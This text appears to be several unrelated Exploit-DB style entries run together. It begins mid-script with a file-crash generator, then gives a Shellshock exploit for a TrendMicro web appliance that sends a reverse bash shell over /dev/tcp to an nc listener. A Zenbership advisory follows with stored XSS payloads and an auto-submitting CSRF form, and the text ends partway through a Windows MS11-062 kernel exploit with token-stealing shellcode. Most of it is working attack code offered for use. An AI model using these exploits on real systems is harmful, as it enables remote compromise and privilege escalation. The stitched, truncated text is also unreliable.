ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60'
ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e'
ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20'
ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77'
ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20'
ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20'
ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27'
ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d'
ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27'
ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20'
ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20'
ban+='\n'
ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n'
ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n'
print ban
pof1 = "<"
pof2 = "http://"
Crash = "\x41"*19
pof3=">"
vm = pof1+pof2+Crash+pof3+pof1+pof2+Crash+pof3
Crash_file=("Crach.ovf")
file = open(Crash_file, "w")
file.write(vm)
file.close()
print 'file done'.format(Crash_file)
#!/usr/bin/env python
# TrendMicro InterScan Web Security Virtul Appliance
# ==================================================
# InterScan Web Security is a software virtual appliance that
# dynamically protects against the ever-growing flood of web
# threats at the Internet gateway exclusively designed to secure
# you against traditional and emerging web threats at the Internet
# gateway. The appliance however is shipped with a vulnerable
# version of Bash susceptible to shellshock (I know right?). An
# attacker can exploit this vulnerability by calling the CGI
# shellscript "/cgi-bin/cgiCmdNotify" which can be exploited
# to perform arbitrary code execution. A limitation of this
# vulnerability is that the attacker must have credentials for
# the admin web interface to exploit this flaw. The panel runs
# over HTTP by default so a man-in-the-middle attack could be
# used to gain credentials and compromise the appliance.
#
# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1
# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit
# [-] Authenticating to '192.168.56.101' with 'admin' 'password'
# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA
# [-] exploiting shellshock CVE-2014-6271...
# bash: no job control in this shell
# bash-4.1$ id
# uid=498(iscan) gid=499(iscan) groups=499(iscan)
#
# -- Hacker Fantastic
#
# (https://www.myhackerhouse.com)
import requests
import sys
import os
def spawn_listener():
os.system("nc -l 8080")
def shellshock(ip,session,cbip):
user_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'}
cookies = {'JSESSIONID': session}
print "[-] exploiting shellshock CVE-2014-6271..."
myreq = requests.get("http://"+ip+":1812/cgi-bin/cgiCmdNotify", headers = user_agent, cookies = cookies)
def login_http(ip,user,password):
mydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'}
print "[-] Authenticating to '%s' with '%s' '%s'" % (ip,user,password)
myreq = requests.post("http://"+ip+":1812/uilogonsubmit.jsp", data=mydata)
session_cookie = myreq.history[0].cookies.get('JSESSIONID')
print "[-] JSESSIONID = %s" % session_cookie
return session_cookie
if __name__ == "__main__":
print "[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit"
if len(sys.argv) < 5:
print "[-] use with <ip> <user> <pass> <connectback_ip>"
sys.exit()
newRef=os.fork()
if newRef==0:
spawn_listener()
else:
session = login_http(sys.argv[1],sys.argv[2],sys.argv[3])
shellshock(sys.argv[1],session,sys.argv[4])
1. ADVISORY INFORMATION
========================================
Title: Zenbership (latest version) - Multiple Vulnerabilities
Application: Zenbership
Class: Sensitive Information disclosure
Versions Affected: <= latest version )
Vendor URL: https://www.zenbership.com/
Software URL: https://www.zenbership.com/Download
Bugs: CSRF / Persistent Cross Site Scripting
Date of found: 23.10.2016
Author: Besim
2.CREDIT
========================================
Those vulnerabilities was identified by Besim ALTINOK and Mrs. Meryem AKDOĞAN
3. VERSIONS AFFECTED
========================================
<= latest version
4. TECHNICAL DETAILS & POC
========================================
PR1 - Stored Cross Site Scripting
========================================
1 ) Admin login admin panel
2 ) Create contact form for guest (http://site_name/path/register.php?action=reset&id=3c035c2)
3 ) Attacker enter xss payload to last name input
4 ) XSS Payload run when admin looked contact page (http://site_name/path/admin/index.php?l=contacts)
5 ) Vulnerability Parameter and Payload : &last_name=<Script>alert('ExploitDB')</Script>
## HTTP Request ##
POST /zenbership/pp-functions/form_process.php HTTP/1.1
Host: site_name
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site_name/zenbership/register.php?action=reset&id=3c035c2
Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44; zen_cart=WJL-1484545251; zen_0176e737b450bbd83f5fc1066=253782
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
- POST DATA
page=1
&session=zen_0176e737b450bbd83f5fc1066
&first_name=Besim
&last_name=<Script>alert('ExploitDB')</Script>
&email=exploit@yopmail.com
PR2 - CSRF
========================================
1 ) Attacker can add new event with xss payload (stored)
- File : admin/cp-functions/event-add.php
HTTP Request and CSRF PoC
=========================
## HTTP Request ##
POST /zenbership/admin/cp-functions/event-add.php HTTP/1.1
Host: site_name
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://site_name/zenbership/admin/index.php?l=events
Content-Length: 1206
Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_cart=LKQ-4724862238; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44
Connection: close
- POST DATA
id=JFW996951
&ext=
&edit=0
&event[id]=JFW996951&event[status]=1
&event[name]=<Script>alert('Meryem-ExploitDB');</Script>
&event[tagline]=Meryem&event[description]=<p>Meryem AKDOGAN</p>
&event[post_rsvp_message]=<p>Meryem AKDOGAN</p>
&event[calendar_id]=1
&event[custom_template]=
&tags=
&event[starts]=2016-10-26 00:00:00
&event[ends]=2016-10-28 00:00:00
&event[start_registrations]=2016-10-24 00:00:00
&event[close_registration]=&event[early_bird_end]=
&event[online]=0&event[location_name]=Turkey
&event[url]=&event[address_line_1]=
&event[address_line_2]=&event[city]=
&event[state]=&event[zip]=
&event[country]=
&event[phone]=
&limit_attendees_dud=0
&event[max_rsvps]=
&event[members_only_view]=0
&event[members_only_rsvp]=0
&event[allow_guests]=1
&event[max_guests]=1
&form[col2][Account Overview]=section
&form[col2][company_name]=1
&form[col2][address_line_1]=0
&form[col2][address_line_2]=0
&form[col2][city]=0
&form[col2][state]=0
&form[col2][zip]=0
&form[col2][country]=0
&form[col2][url]=0
## CSRF PoC ##
<html>
<!-- CSRF PoC -->
<body>
<form action="http://site_name/path/admin/cp-functions/event-add.php" method="POST">
<input type="hidden" name="id" value="OXH978786" />
<input type="hidden" name="ext" value="" />
<input type="hidden" name="edit" value="0" />
<input type="hidden" name="event[id]" value="OXH978786" />
<input type="hidden" name="event[status]" value="1" />
<input type="hidden" name="event[name]" value="<script>alert('Meryem-ExploitDB');</Script>" />
<input type="hidden" name="event[tagline]" value="meryem" />
<input type="hidden" name="event[description]" value="<p>Meryem AKDOGAN</p> " />
<input type="hidden" name="event[post_rsvp_message]" value="<p>Meryem AKDOGAN</p> " />
<input type="hidden" name="event[calendar_id]" value="1" />
<input type="hidden" name="event[custom_template]" value="" />
<input type="hidden" name="tags" value="meryem" />
<input type="hidden" name="event[starts]" value="2016-10-26 00:00:00" />
<input type="hidden" name="event[ends]" value="2016-10-28 00:00:00" />
<input type="hidden" name="event[start_registrations]" value="2016-10-24 00:00:00" />
<input type="hidden" name="event[close_registration]" value="" />
<input type="hidden" name="event[early_bird_end]" value="" />
<input type="hidden" name="event[online]" value="0" />
<input type="hidden" name="event[location_name]" value="Turkey" />
<input type="hidden" name="event[url]" value="" />
<input type="hidden" name="event[address_line_1]" value="" />
<input type="hidden" name="event[address_line_2]" value="" />
<input type="hidden" name="event[city]" value="" />
<input type="hidden" name="event[state]" value="" />
<input type="hidden" name="event[zip]" value="" />
<input type="hidden" name="event[country]" value="" />
<input type="hidden" name="event[phone]" value="" />
<input type="hidden" name="limit_attendees_dud" value="0" />
<input type="hidden" name="event[max_rsvps]" value="" />
<input type="hidden" name="event[members_only_view]" value="0" />
<input type="hidden" name="event[members_only_rsvp]" value="0" />
<input type="hidden" name="event[allow_guests]" value="1" />
<input type="hidden" name="event[max_guests]" value="1" />
<input type="hidden" name="form[col2][Account Overview]" value="section" />
<input type="hidden" name="form[col2][company_name]" value="1" />
<input type="hidden" name="form[col2][address_line_1]" value="0" />
<input type="hidden" name="form[col2][address_line_2]" value="0" />
<input type="hidden" name="form[col2][city]" value="0" />
<input type="hidden" name="form[col2][state]" value="0" />
<input type="hidden" name="form[col2][zip]" value="0" />
<input type="hidden" name="form[col2][country]" value="0" />
<input type="hidden" name="form[col2][url]" value="0" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
/*
################################################################
# Exploit Title: Windows x86 (all versions) NDISTAPI privilege escalation (MS11-062)
# Date: 2016-10-24
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP Pro SP2 x64
# Windows Server 2003 SP2 x86
# Windows Server 2003 SP2 x64
# Windows Server 2003 SP2 Itanium-based Systems
# Supported Vulnerable Software:
# Windows XP SP3 x86
# Windows Server 2003 SP2 x86
# Tested Software:
# Windows XP Pro SP3 x86 EN [5.1.2600]
# Windows Server 2003 Ent SP2 EN [5.2.3790]
# CVE ID: 2011-1974
################################################################
# Vulnerability description:
# An elevation of privilege vulnerability exists in the
# NDISTAPI.sys component of the Remote Access Service NDISTAPI
# driver. The vulnerability is caused when the NDISTAPI driver
# improperly validates user-supplied input when passing data
# from user mode to the Windows kernel.
# An attacker must have valid logon credentials and be able to
# log on locally to exploit the vulnerability.
# An attacker who successfully exploited this vulnerability could
# run arbitrary code in kernel mode (i.e. with NT AUTHORITY\SYSTEM
# privileges).
################################################################
# Exploit notes:
# Privileged shell execution:
# - the SYSTEM shell will spawn within the invoking shell/process
# Exploit compiling (Kali GNU/Linux Rolling 64-bit):
# - # i686-w64-mingw32-gcc MS11-062.c -o MS11-062.exe -lws2_32
# Exploit prerequisites:
# - low privilege access to the target OS
# - target OS not patched (KB2566454)
# - Remote Access Service (RAS) running
# - sc query remoteaccess
# - sc start remoteaccess
################################################################
# Patches:
# Windows XP SP3 x86
# WindowsXP-KB2566454-x86-enu.exe
# (not available - EoL)
# Windows Server 2003 SP2 x86
# WindowsServer2003-KB2566454-x86-enu.exe
# https://www.microsoft.com/en-us/download/details.aspx?id=27093
################################################################
# Thanks to:
# Ni Tao (writeup)
# Google Translate (Chinese -> Engrish)
################################################################
# References:
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1974
# https://technet.microsoft.com/en-us/library/security/ms11-062.aspx
# http://www.cas.stc.sh.cn/jsjyup/pdf/2015/5/%E5%9F%BA%E4%BA%8E%E9%9D%99%E6%80%81%E6%B1%A1%E7%82%B9%E5%88%86%E6%9E%90%E6%8A%80%E6%9C%AF%E7%9A%84%E8%BD%AF%E4%BB%B6%E5%86%85%E6%A0%B8%E9%A9%B1%E5%8A%A8%E5%AE%89%E5%85%A8%E6%80%A7%E6%A3%80%E6%B5%8B.pdf
# https://translate.google.com/
################################################################
*/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <ws2tcpip.h>
#pragma comment (lib, "ws2_32.lib")
////////////////////////////////////////////////////////////////
// DEFINE DATA TYPES
////////////////////////////////////////////////////////////////
typedef enum _KPROFILE_SOURCE {
ProfileTime,
ProfileAlignmentFixup,
ProfileTotalIssues,
ProfilePipelineDry,
ProfileLoadInstructions,
ProfilePipelineFrozen,
ProfileBranchInstructions,
ProfileTotalNonissues,
ProfileDcacheMisses,
ProfileIcacheMisses,
ProfileCacheMisses,
ProfileBranchMispredictions,
ProfileStoreInstructions,
ProfileFpInstructions,
ProfileIntegerInstructions,
Profile2Issue,
Profile3Issue,
Profile4Issue,
ProfileSpecialInstructions,
ProfileTotalCycles,
ProfileIcacheIssues,
ProfileDcacheAccesses,
ProfileMemoryBarrierCycles,
ProfileLoadLinkedIssues,
ProfileMaximum
} KPROFILE_SOURCE, *PKPROFILE_SOURCE;
typedef DWORD (WINAPI *PNTQUERYINTERVAL) (
KPROFILE_SOURCE ProfileSource,
PULONG Interval
);
typedef LONG NTSTATUS;
typedef NTSTATUS (WINAPI *PNTALLOCATE) (
HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG ZeroBits,
PULONG RegionSize,
ULONG AllocationType,
ULONG Protect
);
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
////////////////////////////////////////////////////////////////
// FUNCTIONS
////////////////////////////////////////////////////////////////
BOOL IsWow64()
{
BOOL bIsWow64 = FALSE;
LPFN_ISWOW64PROCESS fnIsWow64Process;
fnIsWow64Process = (LPFN_ISWOW64PROCESS) GetProcAddress(GetModuleHandle(TEXT("kernel32")), "IsWow64Process");
if(NULL != fnIsWow64Process)
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms684139(v=vs.85).aspx
if (!fnIsWow64Process(GetCurrentProcess(), &bIsWow64))
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
printf(" [-] Failed (error code: %d)\n", GetLastError());
return -1;
}
}
return bIsWow64;
}
////////////////////////////////////////////////////////////////
// MAIN FUNCTION
////////////////////////////////////////////////////////////////
int main(void)
{
printf("[*] MS11-062 (CVE-2011-1974) x86 exploit\n");
printf(" [*] by Tomislav Paskalev\n");
////////////////////////////////////////////////////////////////
// IDENTIFY TARGET OS ARCHITECTURE AND VERSION
////////////////////////////////////////////////////////////////
printf("[*] Identifying OS\n");
// identify target machine's OS architecture
// in case the target machine is running a 64-bit OS
if(IsWow64())
{
printf(" [-] 64-bit\n");
return -1;
}
printf(" [+] 32-bit\n");
// identify target machine's OS version
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724451(v=vs.85).aspx
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832(v=vs.85).aspx
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724833(v=vs.85).aspx
OSVERSIONINFOEX osvi;
ZeroMemory(&osvi, sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
GetVersionEx((LPOSVERSIONINFO) &osvi);
// define operating system version specific variables
unsigned char shellcode_KPROCESS;
unsigned char shellcode_TOKEN;
unsigned char shellcode_UPID;
unsigned char shellcode_APLINKS;
const char **securityPatchesPtr;
int securityPatchesCount;
////////////////////////////////////////////////////////////////
/*
OS VERSION SPECIFIC OFFSETS
references:
http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/original.htm
http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/late52.htm
http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/current.htm
http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/eprocess/
*/
////////////////////////////////////////////////////////////////
// in case the OS version is 5.1, service pack 3
if((osvi.dwMajorVersion == 5) && (osvi.dwMinorVersion == 1) && (osvi.wServicePackMajor == 3))
{
// the target machine's OS is Windows XP SP3
printf(" [+] Windows XP SP3\n");
shellcode_KPROCESS = '\x44';
shellcode_TOKEN = '\xC8';
shellcode_UPID = '\x84';
shellcode_APLINKS = '\x88';
const char *securityPatches[] = {"KB2566454"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 1;
}
// in case the OS version is 5.2, service pack 2, not R2
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724385(v=vs.85).aspx
else if((osvi.dwMajorVersion == 5) && (osvi.dwMinorVersion == 2) && (osvi.wServicePackMajor == 2) && (GetSystemMetrics(89) == 0))
{
// the target machine's OS is Windows Server 2003 SP2
printf(" [+] Windows Server 2003 SP2\n");
shellcode_KPROCESS = '\x38';
shellcode_TOKEN = '\xD8';
shellcode_UPID = '\x94';
shellcode_APLINKS = '\x98';
const char *securityPatches[] = {"KB2566454"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 1;
}
// in case the OS version is not any of the previously checked versions
else
{
// the target machine's OS is an unsupported 32-bit Windows version
printf(" [-] Unsupported version\n");
printf(" [*] Affected 32-bit operating systems\n");
printf(" [*] Windows XP SP3\n");
printf(" [*] Windows Server 2003 SP2\n");
return -1;
}
////////////////////////////////////////////////////////////////
// LOCATE REQUIRED OS COMPONENTS
////////////////////////////////////////////////////////////////
printf("[*] Locating required OS components\n");
// retrieve system information
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms725506(v=vs.85).aspx
// locate "ZwQuerySystemInformation" in the "ntdll.dll" module
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms683212(v=vs.85).aspx
FARPROC ZwQuerySystemInformation;
ZwQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwQuerySystemInformation");
// 11 = SystemModuleInformation
// http://winformx.florian-rappl.de/html/e6d5d5c1-8d83-199b-004f-8767439c70eb.htm
ULONG systemInformation;
ZwQuerySystemInformation(11, (PVOID) &systemInformation, 0, &systemInformation);
// allocate memory for the list of loaded modules
ULONG *systemInformationBuffer;
systemInformationBuffer = (ULONG *) malloc(systemInformation * sizeof(*systemInformationBuffer));
if(!systemInformationBuffer)
{
printf(" [-] Could not allocate memory");
return -1;
}
// retrieve the list of loaded modules
ZwQuerySystemInformation(11, systemInformationBuffer, systemInformation * sizeof(*systemInformationBuffer), NULL);
// locate "ntkrnlpa.exe" or "ntoskrnl.exe" in the retrieved list of loaded modules
ULONG i;
PVOID targetKrnlMdlBaseAddr;
HMODULE targetKrnlMdlUsrSpcOffs;
BOOL foundModule = FALSE;
PSYSTEM_MODULE_INFORMATION loadedMdlStructPtr;
loadedMdlStructPtr = (PSYSTEM_MODULE_INFORMATION) (systemInformationBuffer + 1);
for(i = 0; i < *systemInformationBuffer; i++)
{
if(strstr(loadedMdlStructPtr[i].ImageName, "ntkrnlpa.exe"))
{
printf(" [+] ntkrnlpa.exe\n");
targetKrnlMdlUsrSpcOffs = LoadLibraryExA("ntkrnlpa.exe", 0, 1);
targetKrnlMdlBaseAddr = loadedMdlStructPtr[i].Base;
foundModule = TRUE;
break;
}
else if(strstr(loadedMdlStructPtr[i].ImageName, "ntoskrnl.exe"))
{
printf(" [+] ntoskrnl.exe\n");
targetKrnlMdlUsrSpcOffs = LoadLibraryExA("ntoskrnl.exe", 0, 1);
targetKrnlMdlBaseAddr = loadedMdlStructPtr[i].Base;
foundModule = TRUE;
break;
}
}
// base address of the loaded module (kernel space)
printf(" [*] Address: %#010x\n", targetKrnlMdlBaseAddr);
// offset address (relative to the parent process) of the loaded module (user space)
printf(" [*] Offset: %#010x\n", targetKrnlMdlUsrSpcOffs);
if(!foundModule)
{
printf(" [-] Could not find ntkrnlpa.exe/ntoskrnl.exe\n");
return -1;
}
// free allocated buffer space
free(systemInformationBuffer);
// determine the address of the "HalDispatchTable" process (kernel space)
// locate the offset fo the "HalDispatchTable" process within the target module (user space)
ULONG_PTR HalDispatchTableUsrSpcOffs;
HalDispatchTableUsrSpcOffs = (ULONG_PTR) GetProcAddress(targetKrnlMdlUsrSpcOffs, "HalDispatchTable");
if(!HalDispatchTableUsrSpcOffs)
{
printf(" [-] Could not find HalDispatchTable\n");
return -1;
}
printf(" [+] HalDispatchTable\n");
printf(" [*] Offset: %#010x\n", HalDispatchTableUsrSpcOffs);
// calculate the address of "HalDispatchTable" in kernel space
// 1. identify the base address of the target module in kernel space
// 2. previous step's result [minus] the load address of the same module in user space
// 3. previous step's result [plus] the address of "HalDispatchTable" in user space
// EQUIVALENT TO:
// 1. determine RVA of HalDispatchTable
// *Relative Virtual Address - the address of an item after it is loaded into memory, with the base address of the image file subtracted from it.
// 2. previous step's result [plus] base address of target module in kernel space
ULONG_PTR HalDispatchTableKrnlSpcAddr;
HalDispatchTableKrnlSpcAddr = HalDispatchTableUsrSpcOffs - (ULONG_PTR) targetKrnlMdlUsrSpcOffs;
HalDispatchTableKrnlSpcAddr += (ULONG_PTR) targetKrnlMdlBaseAddr;
// locate "NtQueryIntervalProfile" in the "ntdll.dll" module
PNTQUERYINTERVAL NtQueryIntervalProfile;
NtQueryIntervalProfile = (PNTQUERYINTERVAL) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
if(!NtQueryIntervalProfile)
{
printf(" [-] Could not find NtQueryIntervalProfile\n");
return -1;
}
printf(" [+] NtQueryIntervalProfile\n");
printf(" [*] Address: %#010x\n", NtQueryIntervalProfile);
////////////////////////////////////////////////////////////////
// CREATE TOKEN STEALING SHELLCODE
////////////////////////////////////////////////////////////////
printf("[*] Creating token stealing shellcode\n");
// construct the token stealing shellcode
unsigned char shellcode[] =
{
0x52, // PUSH EDX Save EDX on the stack (save context)
0x53, // PUSH EBX Save EBX on the stack (save context)
0x33,0xC0, // XOR EAX, EAX Zero out EAX (EAX = 0)
0x64,0x8B,0x80,0x24,0x01,0x00,0x00, // MOV EAX, FS:[EAX+0x124] Retrieve current _KTHREAD structure
0x8B,0x40,shellcode_KPROCESS, // MOV EAX, [EAX+_KPROCESS] Retrieve _EPROCESS structure
0x8B,0xC8, // MOV ECX, EAX Copy EAX (_EPROCESS) to ECX
0x8B,0x98,shellcode_TOKEN,0x00,0x00,0x00, // MOV EBX, [EAX+_TOKEN] Retrieve current _TOKEN
0x8B,0x80,shellcode_APLINKS,0x00,0x00,0x00, // MOV EAX, [EAX+_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xE8,shellcode_APLINKS,0x00,0x00,0x00, // SUB EAX, _APLINKS | Retrieve EPROCESS from ActiveProcessLinks
0x81,0xB8,shellcode_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // CMP [EAX+_UPID], 0x4 | Compare UniqueProcessId with 4 (System Process)
0x75,0xE8, // JNZ/JNE ---- Jump if not zero/not equal
0x8B,0x90,shellcode_TOKEN,0x00,0x00,0x00, // MOV EDX, [EAX+_TOKEN] Copy SYSTEM _TOKEN to EDX
0x8B,0xC1, // MOV EAX, ECX Copy ECX (current process _TOKEN) to EAX
0x89,0x90,shellcode_TOKEN,0x00,0x00,0x00, // MOV [EAX+_TOKEN], EDX Copy SYSTEM _TOKEN to current process _TOKEN
0x5B, // POP EBX Pop current stack value to EBX (restore context)
0x5A, // POP EDX Pop current stack value to EDX (restore context)
0xC2,0x08 // RET 8 Return
};
printf(" [*] Shellcode assembled\n");
// allocate memory (RWE permissions) for the shellcode
printf(" [*] Allocating memory\n");
LPVOID shellcodeAddress;
shellcodeAddress = VirtualAlloc(NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if(shellcodeAddress == NULL)
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
printf(" [-] Failed (error code: %d)\n", GetLastError());
return -1;
}
printf(" [+] Address: %#010x\n", shellcodeAddress);
// copy the shellcode to the allocated memory
memcpy((shellcodeAddress), shellcode, sizeof(shellcode));
printf(" [*] Shellcode copied\n");
////////////////////////////////////////////////////////////////
// EXPLOIT THE VULNERABILITY
////////////////////////////////////////////////////////////////
printf("[*] Exploiting vulnerability\n");
// open the vulnerable device driver
HANDLE targetDeviceHandle;
ULONG dwReturnSize;
int errorCode = 0;
printf(" [*] Opening NDISTAPI device driver\n");
// https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx
targetDeviceHandle = CreateFile("\\\\.\\NDISTAPI", GENERIC_READ | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
// in case the function fails
if(targetDeviceHandle == INVALID_HANDLE_VALUE)
{
// the device driver was not opened successfully
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms679360(v=vs.85).aspx
errorCode = GetLastError();
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
// in case of ERROR_FILE_NOT_FOUND
if(errorCode == 2)
{
// the vulnerable service is not running
printf(" [!] Remote Access Service not started\n");
printf(" [*] run \"sc start remoteaccess\"\n");
return -1;
}
// in case of any other error message
else
{
printf(" [-] Failed (error code: %d)\n", errorCode);
return -1;
}
}
// in case the function succeeds
else
{
// the device driver was opened succesfully
printf(" [+] Done\n");
}
// copy the shellcode address to the input buffer
unsigned char InputBuffer[8]={0};
memcpy((InputBuffer + 4), &shellcodeAddress, sizeof(shellcodeAddress));
// trigger vulnerability (cause arbitrary memory overwrite)
printf(" [*] Calling vulnerable function\n");
if(DeviceIoControl(
targetDeviceHandle,
0x8fff23d4, // DoLineCreateWork
